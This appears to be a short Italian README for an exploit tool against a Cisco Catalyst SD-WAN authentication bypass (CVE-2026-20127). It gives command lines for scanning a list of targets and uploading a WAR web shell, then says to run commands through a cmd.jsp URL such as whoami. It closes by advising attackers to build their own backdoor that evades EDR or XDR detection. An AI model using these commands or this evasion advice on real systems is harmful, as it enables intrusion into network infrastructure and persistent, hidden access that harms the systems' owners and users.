
Exploit per la vulnerabilità di bypass dell'autenticazione Cisco Catalyst SD-WAN (CVE-2026-20127)
Exploit EXP per la vulnerabilità di bypass dell'autenticazione Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
Dopo che la riproduzione della vulnerabilità ha avuto successo, accedi a /cmd.gz/cmd.jsp?cmd=whoami e il risultato verrà visualizzato nella pagina
Se è necessario sostituirlo con una webshell, crea tu stesso il pacchetto WAR (si consiglia di utilizzare una backdoor che eviti il rilevamento; dopo i test, sui sistemi Windows potrebbero essere presenti EDR o XDR)